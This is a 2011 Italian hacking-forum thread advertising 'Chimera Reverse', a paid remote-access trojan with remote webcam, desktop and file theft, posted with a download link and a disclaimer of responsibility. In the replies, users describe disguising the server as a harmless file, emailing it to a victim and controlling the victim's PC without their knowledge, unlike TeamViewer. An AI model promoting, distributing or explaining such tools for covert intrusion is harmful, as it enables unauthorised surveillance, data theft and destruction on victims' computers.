BorderGame
Chimera Reverse - Controllo Remoto Di Un PC - Versione stampabile

+- BorderGame (https://www.bordergame.it)
+-- Forum: Console e Tecnologia (/Forum-Console-e-Tecnologia)
+--- Forum: Hacking (/Forum-Hacking)
+--- Discussione: Chimera Reverse - Controllo Remoto Di Un PC (/Thread-Chimera-Reverse-Controllo-Remoto-Di-Un-PC)



Chimera Reverse - Controllo Remoto Di Un PC - ._.Alex._. - 16-08-2011 09:01 PM

Salve ragazzi, oggi vi posto un nuovo software.
Questo software permette di avere il completo controllo remoto di un qualsiasi computer ( anche più computer collegati ).
Nel software sono presenti tool come Webcam Remota,Desktop Remoto,Download e Visualizzazione di File Remoti e molto altro.
Il programma ha richiesto molti mesi di progettazione e dopo vari test è stato completato.
Il programma costa poco e le funzioni sono uniche ( superano addirittura il SubMe Reverse )
Video Dimostrativo :







Download:
http://www.megaupload.com/?d=SYM615HW


RICORDO CHE NE IO E NE IL NOSTRUCCHI FORUM CI ASSUMIAMO NESSUNA RESPONSABILITA' DELL'USO CHE FARETE.


RE: Chimera Reverse - Controllo Remoto Di Un PC - Nico - 16-08-2011 09:16 PM

Scs ma dentro ci sono solo icone -.-


RE: Chimera Reverse - Controllo Remoto Di Un PC - ._.Alex._. - 16-08-2011 09:25 PM

estrai il contenuto su una cartella e dopo apri chimera, cliccandoci sopra.


RE: Chimera Reverse - Controllo Remoto Di Un PC - Diedarrow13 - 19-08-2011 05:56 PM

@[._.Alex._.] Il server da quanto ho capito si paga, giusto? D:


RE: Chimera Reverse - Controllo Remoto Di Un PC - ._.Alex._. - 19-08-2011 07:15 PM

Si costa ben 60 euro =D


RE: Chimera Reverse - Controllo Remoto Di Un PC - Diedarrow13 - 19-08-2011 07:26 PM

Ok... mi sa che non lo userò mai xD


RE: Chimera Reverse - Controllo Remoto Di Un PC - Kanta93 - 23-09-2011 08:13 PM

quoto die


RE: Chimera Reverse - Controllo Remoto Di Un PC - Gafra96 - 25-09-2011 09:14 PM

60 euro spesi invani Smile


RE: Chimera Reverse - Controllo Remoto Di Un PC - ._.Alex._. - 26-09-2011 07:33 AM

(25-09-2011 09:14 PM)Gafra96 Ha scritto:  60 euro spesi invani Smile
Io lo comprato, e funziona alla grande...


RE: Chimera Reverse - Controllo Remoto Di Un PC - SCL - 06-11-2011 10:40 AM

Dici? Confused
CondorHacker ha detto che lavorando con lui ha potuto vedere che i suoi programmi erano delle boiate..
Poi non so se è vero.. Però io mi fiderei


RE: Chimera Reverse - Controllo Remoto Di Un PC - Yoshitoki - 06-11-2011 12:25 PM

Scusa ma Team Viewar non è piu' facile? E gratuito sopratutto...?


RE: Chimera Reverse - Controllo Remoto Di Un PC - Nico - 06-11-2011 01:10 PM

Si ma questo ti spiego come funge. Allora se te per esempio per e-mail, mandi un file (che è il server camuffato) e tipo lo chiami Chefigata.flashplayer, quando la vittima lo apre, il server camuffato, si conn al tuo pc, e tu puoi fargli di tutto, puoi spegnere il pc,canc tutto, vedere il video, controllarlo come team(anche meglio) puoi fare le scansioni ec..


RE: Chimera Reverse - Controllo Remoto Di Un PC - SCL - 06-11-2011 08:03 PM

In poche parole, time viewer per entrare hai bisogno di una id ed una password.
Chimera no.
In time viewer, la persone controllata sa cosa fa la seconda persona, anche se fruga in cartelle.
in chimera no.